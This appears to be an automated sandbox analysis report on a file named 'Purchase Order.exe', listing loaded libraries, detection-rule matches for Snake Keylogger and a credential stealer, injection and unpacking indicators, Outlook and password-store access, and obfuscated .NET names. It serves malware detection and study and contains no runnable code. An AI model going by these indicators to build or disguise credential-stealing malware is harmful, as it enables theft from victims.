Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dpapi.dll	Jump to behavior

Source: Purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, sTTLqmdBg7QleA98M8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, sTTLqmdBg7QleA98M8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, kjRJGstEDDBD7iomiO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, kjRJGstEDDBD7iomiO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, kjRJGstEDDBD7iomiO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, kjRJGstEDDBD7iomiO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, kjRJGstEDDBD7iomiO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, kjRJGstEDDBD7iomiO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: 0.2.Purchase Order.exe.2751750.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Purchase Order.exe.270d648.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Purchase Order.exe.6770000.11.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Purchase Order.exe.2705630.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4

Source: C:\Users\user\Desktop\Purchase Order.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Mutant created: NULL

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Purchase Order.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Purchase Order.exe, 00000003.00000002.4454181362.000000000305E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4455381181.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000003086000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000003092000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Purchase Order.exe	ReversingLabs: Detection: 21%
Source: Purchase Order.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: LkSW.pdb source: Purchase Order.exe
Source:	Binary string: LkSW.pdbSHA256 source: Purchase Order.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Purchase Order.exe, FormMainMenu.cs	.Net Code: InitializeComponent
Source: 0.2.Purchase Order.exe.26f447c.3.raw.unpack, nL.cs	.Net Code: sf
Source: 0.2.Purchase Order.exe.26f447c.3.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, kjRJGstEDDBD7iomiO.cs	.Net Code: OXIQXiF4JA System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order.exe.4e10000.10.raw.unpack, nL.cs	.Net Code: sf
Source: 0.2.Purchase Order.exe.4e10000.10.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, kjRJGstEDDBD7iomiO.cs	.Net Code: OXIQXiF4JA System.Reflection.Assembly.Load(byte[])

Source: Purchase Order.exe

Static PE information: 0xAEDBFD54 [Mon Dec 18 07:33:40 2062 UTC]

Source: C:\Users\user\Desktop\Purchase Order.exe

Code function: 3_2_052D9770 push esp; ret

3_2_052D9771

Source: Purchase Order.exe

Static PE information: section name: .text entropy: 7.903744951141462

Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, lmCSKqkxvbcUv0f9ul.cs	High entropy of concatenated method names: 'lrsCm167Jl', 'lBFCSCesox', 'AVPCXprApc', 'WfFC5oDnKf', 'WVaCI4VfJM', 'dQ9CKb8FbJ', 'vLuCM3ykbc', 'QLOCVHHj9W', 'hRZCkB3nJj', 'vB7CWhcB5V'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, YD3aDkWAhYlaCudY7h.cs	High entropy of concatenated method names: 'u4CClRBpiN', 'AabCPvG157', 'VSCCog2bhV', 'EdZoZpXjPv', 'xNgozJbZe3', 'LbpCwLIuYF', 'R3lCtEGcg1', 'CnbCgyfcdh', 'QBUCLgnjgi', 'RKiCQBU6kG'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, UJtj33QQf9OGrNofJV.cs	High entropy of concatenated method names: 'POsyIqPaTb', 'n9EyMdcjZj', 'sQ2PB3aKQM', 'qQjPbNh6Bi', 'wRPP9yyo7u', 'Tw8PRha3i3', 'ShYPeD0uZZ', 'MPrPDpAvfA', 'mPCPhdOsBL', 'hYEPJnR8xh'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, Gi42V7b4CWKtlDNmD8S.cs	High entropy of concatenated method names: 'LTWqmU38ri', 'V8NqSqNFAa', 'Wm3qX3Obl0', 'sopq5ayWaa', 'AxJqIBVnpl', 'q8LqKiU40N', 'yomqMPuEXO', 'OSrqVJ7BIX', 'J5lqkSFi4y', 'yEwqWfgCgk'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, SSfJfOD9uII2QRagGu.cs	High entropy of concatenated method names: 'ToString', 'gDc76O4tTw', 'lEO7agD11N', 'NL97BPbW0A', 'Hae7b4hhxZ', 'qJK79yqSgK', 'V3s7RtixYW', 'V6Y7eoBcS3', 'nO07DUnS5X', 'A6O7hXEHho'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, lbLlx0yZDZEKGomBhX.cs	High entropy of concatenated method names: 'qKVclJLdv7', 'Jbkcv9RWjC', 'OC0cPJeapG', 'QiVcy24EOE', 'nrFcodKFga', 'Y8XcCi4pBv', 'LUycNuQrbd', 'SfZcGiai3e', 'Ohkc4u3k9i', 'RxCcU8lUbi'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, YQ96f3IxMwDsWRweCQ.cs	High entropy of concatenated method names: 'ichtCLY2sw', 'nPEtNFal1E', 'SVrt42lbyh', 'voitUDNwys', 'mVYt0UiOhu', 'Sxtt7ZkZJM', 'bXfurOFxphIZyuMsPF', 'ajepI0ml6ad75g50nJ', 'X9utt61Kd5', 'scXtLYRL7Q'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, JCHcV8aUL2LYrcdaP8.cs	High entropy of concatenated method names: 'rTFoTCYXew', 'bJ2ov1ZYAU', 'mfuoy19Rea', 'A0NoCJNAq4', 'vVYoNZGHXP', 'lAcyp1QQk2', 'AiyyH59fOP', 'A4ZyjNVrfS', 'Aiky2FC6rI', 'QddynEqpVF'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, vVw89GTEEGHZqfIDCx.cs	High entropy of concatenated method names: 'X3Yx295nxS', 'Y31xZsJag4', 'JOZcwj4OQg', 'lQZctJg0hx', 'a7Ux6N7GEG', 'bLSxOyK7jQ', 'r61xs3VDi1', 'OBpx3Y9Zja', 'CUrxARJwau', 'H34xie7QAl'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, XxsyFvU1CAusBHVG1V.cs	High entropy of concatenated method names: 'J0Pod33bwJ', 'khUomtQTW4', 'AxZoXw1qLa', 'dV5o5mPUlG', 'KTLoKEsHKY', 'NfpoMctu9w', 'zvmoklIB99', 'KeloWIIE5m', 'xN5o66GuNqds1ClZAQ5', 'D8AbbjGt7fxVYMqC8rL'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, kjRJGstEDDBD7iomiO.cs	High entropy of concatenated method names: 'bZQLTvo1E4', 'Hl7LltCtMG', 'Uh8Lv2umBl', 'aYALPm3lo3', 'r1tLy4Tf0H', 'G0ALo5Ofow', 'A5qLCkNuZW', 'oKbLNvLEef', 'n7eLGTUgx7', 'A2WL4oAXJ1'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, NFl9dTeWHfLYTLW3yh.cs	High entropy of concatenated method names: 'BOwcfTgKVm', 'rN2can3EPy', 'pDIcBpED2r', 'gjscbPBMJ9', 'Xlfc3MrNrL', 'W4wc9VxjtE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, j0EE8QHk5lue28r8uB.cs	High entropy of concatenated method names: 'y8lFVoTBGV', 'M6iFk3yfQw', 'NjbFfEX5ph', 'aZXFaNxfLQ', 'zwRFbeddAK', 'RFyF9K89bD', 'jmtFeRO7tv', 'RjjFDO9HHC', 'QcWFJDbmLA', 'lc0F6IaUvi'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, NqErMOnywQIePHnE7F.cs	High entropy of concatenated method names: 'rILXRUNJW', 'uIO5rapyj', 'hVFKgVWnB', 'ugdMNT7OF', 'LApkb7ZdX', 'ugfWbVQMo', 'ElPbeGxQw5th3k45Tt', 'uRJtLA8y1a0gq4qu8O', 'm96clNdW1', 'L9o8QmBGB'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, pKSdd4qo7Rkj3dksBm.cs	High entropy of concatenated method names: 'F5WqtOB9mq', 'bdWqLaAYHI', 'BkqqQu8Pxv', 'HMAqlMeJHh', 'vVZqvFea7Z', 'xFuqyBEv51', 'aXxqoRwqxy', 'xrpcj3YbDb', 'cDhc2mRNl5', 'TgVcnUPxNl'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, YQF4gH9WZlmAWBbvtg.cs	High entropy of concatenated method names: 'lAoP5VQrLH', 'S4CPKCQEkc', 'sWSPVqhXVA', 'IpqPkOdfKp', 'hAiP0DHEva', 'TonP7yg5wc', 'oFaPxgCFBl', 'rEvPcikugr', 'kUvPqNMkp2', 'CIOP8uSvqS'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, upcImRcG3PisFQYZYA.cs	High entropy of concatenated method names: 'LhhTfCGWl7e0EoO8FL9', 'BQbIvkGETMccpAYFSHD', 'tZMocs5pF5', 'wDZoqJA0kZ', 'aWmo8uxyb6', 'oQ3Wx4GjxR7eTwbAG2C', 'PknOhJG2cVSMBekZp2H'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, V63kI3GXLZktwtCTbY.cs	High entropy of concatenated method names: 'saa0JW3rnx', 'NTr0OslvKM', 'd4W031LZGF', 'pu20ADFMvR', 'e9C0aEjl2X', 'vS20BGmeTV', 'A1y0b15m1p', 'vAx09XFnBO', 'W8f0RTeMvV', 'sL50eqCTor'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, RNRKGw6d6Amo4Pl09i.cs	High entropy of concatenated method names: 'Dispose', 'EpOtnBt4MW', 'rFpgala6pj', 'rhBEEc2hTd', 'zKxtZSP5hd', 'diftzx67AZ', 'ProcessDialogKey', 'rnlgwjEqBn', 'jTtgtD7Wmq', 'e3egg02fw4'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, sTTLqmdBg7QleA98M8.cs	High entropy of concatenated method names: 'B9Cv3PEAq0', 'foKvAKwSfD', 'RINviYhxm8', 'OEbvYuWYEt', 'STuvpVoEPP', 'maRvHrQ14C', 'KQ4vjA5YTj', 'g7yv2yhmS3', 'toevn9mJKh', 'RYcvZpIonu'
Source: 0.2.Purchase Order.exe.6a00000.12.raw.unpack, AmI4iWbPi2Q5KPf6dLM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mY183my4Xg', 'ILg8ATXMxg', 'pSE8in8O1N', 'OU88Y42Xr9', 'xAw8p1DNHF', 'FZy8H8lk7l', 'tP28jhoJVu'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, lmCSKqkxvbcUv0f9ul.cs	High entropy of concatenated method names: 'lrsCm167Jl', 'lBFCSCesox', 'AVPCXprApc', 'WfFC5oDnKf', 'WVaCI4VfJM', 'dQ9CKb8FbJ', 'vLuCM3ykbc', 'QLOCVHHj9W', 'hRZCkB3nJj', 'vB7CWhcB5V'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, YD3aDkWAhYlaCudY7h.cs	High entropy of concatenated method names: 'u4CClRBpiN', 'AabCPvG157', 'VSCCog2bhV', 'EdZoZpXjPv', 'xNgozJbZe3', 'LbpCwLIuYF', 'R3lCtEGcg1', 'CnbCgyfcdh', 'QBUCLgnjgi', 'RKiCQBU6kG'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, UJtj33QQf9OGrNofJV.cs	High entropy of concatenated method names: 'POsyIqPaTb', 'n9EyMdcjZj', 'sQ2PB3aKQM', 'qQjPbNh6Bi', 'wRPP9yyo7u', 'Tw8PRha3i3', 'ShYPeD0uZZ', 'MPrPDpAvfA', 'mPCPhdOsBL', 'hYEPJnR8xh'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, Gi42V7b4CWKtlDNmD8S.cs	High entropy of concatenated method names: 'LTWqmU38ri', 'V8NqSqNFAa', 'Wm3qX3Obl0', 'sopq5ayWaa', 'AxJqIBVnpl', 'q8LqKiU40N', 'yomqMPuEXO', 'OSrqVJ7BIX', 'J5lqkSFi4y', 'yEwqWfgCgk'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, SSfJfOD9uII2QRagGu.cs	High entropy of concatenated method names: 'ToString', 'gDc76O4tTw', 'lEO7agD11N', 'NL97BPbW0A', 'Hae7b4hhxZ', 'qJK79yqSgK', 'V3s7RtixYW', 'V6Y7eoBcS3', 'nO07DUnS5X', 'A6O7hXEHho'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, lbLlx0yZDZEKGomBhX.cs	High entropy of concatenated method names: 'qKVclJLdv7', 'Jbkcv9RWjC', 'OC0cPJeapG', 'QiVcy24EOE', 'nrFcodKFga', 'Y8XcCi4pBv', 'LUycNuQrbd', 'SfZcGiai3e', 'Ohkc4u3k9i', 'RxCcU8lUbi'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, YQ96f3IxMwDsWRweCQ.cs	High entropy of concatenated method names: 'ichtCLY2sw', 'nPEtNFal1E', 'SVrt42lbyh', 'voitUDNwys', 'mVYt0UiOhu', 'Sxtt7ZkZJM', 'bXfurOFxphIZyuMsPF', 'ajepI0ml6ad75g50nJ', 'X9utt61Kd5', 'scXtLYRL7Q'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, JCHcV8aUL2LYrcdaP8.cs	High entropy of concatenated method names: 'rTFoTCYXew', 'bJ2ov1ZYAU', 'mfuoy19Rea', 'A0NoCJNAq4', 'vVYoNZGHXP', 'lAcyp1QQk2', 'AiyyH59fOP', 'A4ZyjNVrfS', 'Aiky2FC6rI', 'QddynEqpVF'
